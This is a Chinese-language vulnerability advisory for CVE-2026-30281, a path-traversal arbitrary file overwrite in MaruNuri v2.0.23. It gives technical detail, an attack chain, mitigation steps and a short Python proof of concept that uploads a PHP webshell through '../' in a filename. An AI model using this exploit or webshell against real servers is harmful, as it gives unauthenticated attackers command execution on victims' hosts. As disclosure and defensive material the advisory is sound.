CVE-2026-30281 CVSS 9.8 严重

CVE-2026-30281 MaruNuri任意文件覆盖漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30281

漏洞类型

任意文件覆盖

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

MaruNuri LLC

漏洞概述

MaruNuri LLC v2.0.23版本中存在一个严重的任意文件覆盖漏洞。由于系统在文件导入过程中缺乏有效的安全校验，未经身份认证的远程攻击者可利用此缺陷上传特制文件并覆盖服务器上的关键内部文件。成功利用该漏洞可能导致任意代码执行或敏感信息泄露，鉴于其CVSS v3.1评分高达9.8分，属于严重级别安全风险，建议立即采取修复措施。

技术细节

该漏洞的技术原理在于MaruNuri LLC v2.0.23应用在处理文件导入功能时，未能正确验证用户提供的文件名参数。应用程序直接使用未经消毒的文件名进行文件写入操作，这使得攻击者能够通过插入路径遍历字符（如../）来绕过预期的目录限制。攻击者可以构造恶意请求，将包含Webshell或恶意脚本的文件写入到Web服务器的可执行目录（如/var/www/html/）或覆盖系统关键的配置文件（如应用配置）。一旦文件被成功写入，攻击者即可通过浏览器或HTTP工具访问该文件，从而在服务器端执行任意系统命令，完全控制受影响的主机。由于该漏洞无需用户交互且无需预先认证，其利用门槛极低，危害性极高。

攻击链分析

STEP 1

侦察

识别互联网上运行MaruNuri LLC v2.0.23版本的目标服务器。

STEP 2

漏洞利用

向目标服务器的文件导入接口发送特制的HTTP POST请求，请求中包含带有路径遍历字符（../）的文件名和恶意代码内容。

STEP 3

文件写入

服务器端应用程序处理该请求，由于未过滤文件名，将恶意文件写入到Web根目录或敏感系统目录，覆盖原有文件。

STEP 4

执行代码

攻击者通过浏览器访问上传的恶意文件URL，触发服务器端解析执行恶意代码，获取系统Shell权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    # Target endpoint for file import
    url = f"{target_url}/api/import"
    
    # Malicious payload to achieve RCE
    payload = "<?php system($_GET['cmd']); ?>"
    
    # Filename with path traversal to overwrite a critical file or upload webshell
    filename = "../../uploads/shell.php"
    
    files = {
        'file': (filename, payload)
    }
    
    try:
        response = requests.post(url, files=files)
        if response.status_code == 200:
            print("[+] Exploit successful! Check your shell at: /uploads/shell.php?cmd=whoami")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

# Usage
# exploit("http://target-ip")

影响范围

MaruNuri LLC v2.0.23

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用文件导入功能以阻断攻击路径。同时，应在网络边界（如WAF或防火墙）部署规则，检测并拦截包含路径遍历字符（如../）的HTTP请求。此外，应加强系统文件完整性监控，一旦发现关键文件被非预期修改，立即进行告警和隔离。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-30281
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-30281
3 Details https://www.cvedetails.com/cve/CVE-2026-30281/
4 VulDB https://vuldb.com/cve/CVE-2026-30281
5 Link https://github.com/Secsys-FDU/AF_CVEs/issues/21
6 Link https://maru.xyz/
7 Link https://play.google.com/store/apps/details?id=neo.maru
8 Link https://secsys.fudan.edu.cn/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表